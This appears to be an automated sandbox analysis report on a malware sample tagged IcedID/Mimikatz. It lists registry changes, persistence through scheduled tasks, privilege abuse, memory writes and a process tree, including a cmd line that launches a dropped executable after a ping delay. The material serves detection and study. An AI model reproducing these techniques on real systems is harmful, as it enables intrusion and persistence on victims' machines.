\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yrhtynb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2836 cmd.exe 2748 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral1/files/0x0008000000016d29-5.dat nsis_installer_2 behavioral1/files/0x0007000000016d65-15.dat nsis_installer_1 behavioral1/files/0x0007000000016d65-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" yrhtynb.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" zeeblsutf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot yrhtynb.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B8C23822-B12B-4877-9A73-C32A137B4756}\d6-f1-ee-0f-79-77 yrhtynb.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" zeeblsutf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings yrhtynb.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zeeblsutf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" zeeblsutf.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zeeblsutf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates yrhtynb.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs yrhtynb.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs yrhtynb.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs yrhtynb.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople yrhtynb.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" yrhtynb.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals zeeblsutf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates yrhtynb.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs yrhtynb.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 yrhtynb.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-f1-ee-0f-79-77\WpadDecision = "0" yrhtynb.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates yrhtynb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root yrhtynb.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates yrhtynb.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix yrhtynb.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" zeeblsutf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My yrhtynb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust yrhtynb.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zeeblsutf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs yrhtynb.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B8C23822-B12B-4877-9A73-C32A137B4756}\WpadDecisionTime = b0a661c0d204db01 yrhtynb.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B8C23822-B12B-4877-9A73-C32A137B4756}\WpadNetworkName = "Network 3" yrhtynb.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-f1-ee-0f-79-77\WpadDecisionReason = "1" yrhtynb.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" yrhtynb.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" yrhtynb.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zeeblsutf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B8C23822-B12B-4877-9A73-C32A137B4756} yrhtynb.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs yrhtynb.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates yrhtynb.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-f1-ee-0f-79-77\WpadDecisionTime = b0a661c0d204db01 yrhtynb.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zeeblsutf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0191000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 yrhtynb.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs yrhtynb.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" yrhtynb.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" yrhtynb.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 yrhtynb.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 yrhtynb.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2748 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2440 schtasks.exe 2848 schtasks.exe 2784 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 1472 yrhtynb.exe 1588 yrhtynb.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe -
Suspicious behavior: LoadsDriver 31 IoCs
pid Process 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found 472 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2732 2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2732 2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2908 yrhtynb.exe Token: SeDebugPrivilege 2756 yrhtynb.exe Token: SeDebugPrivilege 1544 vfshost.exe Token: SeAuditPrivilege 2916 svchost.exe Token: SeDebugPrivilege 1736 zeeblsutf.exe Token: SeShutdownPrivilege 1736 zeeblsutf.exe Token: SeLockMemoryPrivilege 2564 uevevu.exe Token: SeLockMemoryPrivilege 2564 uevevu.exe Token: SeDebugPrivilege 2704 zeeblsutf.exe Token: SeShutdownPrivilege 2704 zeeblsutf.exe Token: SeDebugPrivilege 1028 zeeblsutf.exe Token: SeShutdownPrivilege 1028 zeeblsutf.exe Token: SeDebugPrivilege 2028 zeeblsutf.exe Token: SeShutdownPrivilege 2028 zeeblsutf.exe Token: SeDebugPrivilege 2688 zeeblsutf.exe Token: SeShutdownPrivilege 2688 zeeblsutf.exe Token: SeDebugPrivilege 2932 zeeblsutf.exe Token: SeShutdownPrivilege 2932 zeeblsutf.exe Token: SeDebugPrivilege 2412 zeeblsutf.exe Token: SeShutdownPrivilege 2412 zeeblsutf.exe Token: SeDebugPrivilege 668 zeeblsutf.exe Token: SeShutdownPrivilege 668 zeeblsutf.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2732 2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe 2732 2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe 2908 yrhtynb.exe 2908 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 1472 yrhtynb.exe 1472 yrhtynb.exe 2732 xohudmc.exe 2940 zmxrwm.exe 1588 yrhtynb.exe 1588 yrhtynb.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2732 wrote to memory of 2836 2732 2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe 30 PID 2732 wrote to memory of 2836 2732 2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe 30 PID 2732 wrote to memory of 2836 2732 2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe 30 PID 2732 wrote to memory of 2836 2732 2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe 30 PID 2836 wrote to memory of 2748 2836 cmd.exe 32 PID 2836 wrote to memory of 2748 2836 cmd.exe 32 PID 2836 wrote to memory of 2748 2836 cmd.exe 32 PID 2836 wrote to memory of 2748 2836 cmd.exe 32 PID 2836 wrote to memory of 2908 2836 cmd.exe 33 PID 2836 wrote to memory of 2908 2836 cmd.exe 33 PID 2836 wrote to memory of 2908 2836 cmd.exe 33 PID 2836 wrote to memory of 2908 2836 cmd.exe 33 PID 2756 wrote to memory of 2600 2756 yrhtynb.exe 35 PID 2756 wrote to memory of 2600 2756 yrhtynb.exe 35 PID 2756 wrote to memory of 2600 2756 yrhtynb.exe 35 PID 2756 wrote to memory of 2600 2756 yrhtynb.exe 35 PID 2600 wrote to memory of 2652 2600 cmd.exe 37 PID 2600 wrote to memory of 2652 2600 cmd.exe 37 PID 2600 wrote to memory of 2652 2600 cmd.exe 37 PID 2600 wrote to memory of 2652 2600 cmd.exe 37 PID 2600 wrote to memory of 2712 2600 cmd.exe 38 PID 2600 wrote to memory of 2712 2600 cmd.exe 38 PID 2600 wrote to memory of 2712 2600 cmd.exe 38 PID 2600 wrote to memory of 2712 2600 cmd.exe 38 PID 2600 wrote to memory of 2252 2600 cmd.exe 39 PID 2600 wrote to memory of 2252 2600 cmd.exe 39 PID 2600 wrote to memory of 2252 2600 cmd.exe 39 PID 2600 wrote to memory of 2252 2600 cmd.exe 39 PID 2600 wrote to memory of 2128 2600 cmd.exe 40 PID 2600 wrote to memory of 2128 2600 cmd.exe 40 PID 2600 wrote to memory of 2128 2600 cmd.exe 40 PID 2600 wrote to memory of 2128 2600 cmd.exe 40 PID 2600 wrote to memory of 1192 2600 cmd.exe 41 PID 2600 wrote to memory of 1192 2600 cmd.exe 41 PID 2600 wrote to memory of 1192 2600 cmd.exe 41 PID 2600 wrote to memory of 1192 2600 cmd.exe 41 PID 2600 wrote to memory of 700 2600 cmd.exe 42 PID 2600 wrote to memory of 700 2600 cmd.exe 42 PID 2600 wrote to memory of 700 2600 cmd.exe 42 PID 2600 wrote to memory of 700 2600 cmd.exe 42 PID 2756 wrote to memory of 1776 2756 yrhtynb.exe 44 PID 2756 wrote to memory of 1776 2756 yrhtynb.exe 44 PID 2756 wrote to memory of 1776 2756 yrhtynb.exe 44 PID 2756 wrote to memory of 1776 2756 yrhtynb.exe 44 PID 2756 wrote to memory of 2072 2756 yrhtynb.exe 46 PID 2756 wrote to memory of 2072 2756 yrhtynb.exe 46 PID 2756 wrote to memory of 2072 2756 yrhtynb.exe 46 PID 2756 wrote to memory of 2072 2756 yrhtynb.exe 46 PID 2756 wrote to memory of 2688 2756 yrhtynb.exe 48 PID 2756 wrote to memory of 2688 2756 yrhtynb.exe 48 PID 2756 wrote to memory of 2688 2756 yrhtynb.exe 48 PID 2756 wrote to memory of 2688 2756 yrhtynb.exe 48 PID 2756 wrote to memory of 2904 2756 yrhtynb.exe 50 PID 2756 wrote to memory of 2904 2756 yrhtynb.exe 50 PID 2756 wrote to memory of 2904 2756 yrhtynb.exe 50 PID 2756 wrote to memory of 2904 2756 yrhtynb.exe 50 PID 2904 wrote to memory of 2920 2904 cmd.exe 52 PID 2904 wrote to memory of 2920 2904 cmd.exe 52 PID 2904 wrote to memory of 2920 2904 cmd.exe 52 PID 2904 wrote to memory of 2920 2904 cmd.exe 52 PID 2904 wrote to memory of 2920 2904 cmd.exe 52 PID 2904 wrote to memory of 2920 2904 cmd.exe 52 PID 2904 wrote to memory of 2920 2904 cmd.exe 52 PID 2920 wrote to memory of 336 2920 wpcap.exe 53
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1012
-
C:\Windows\TEMP\uqvnjvbfz\uevevu.exe"C:\Windows\TEMP\uqvnjvbfz\uevevu.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Users\Admin\AppData\Local\Temp\2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\kertltug\yrhtynb.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2748
-
-
C:\Windows\kertltug\yrhtynb.exeC:\Windows\kertltug\yrhtynb.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2908
-
-
-
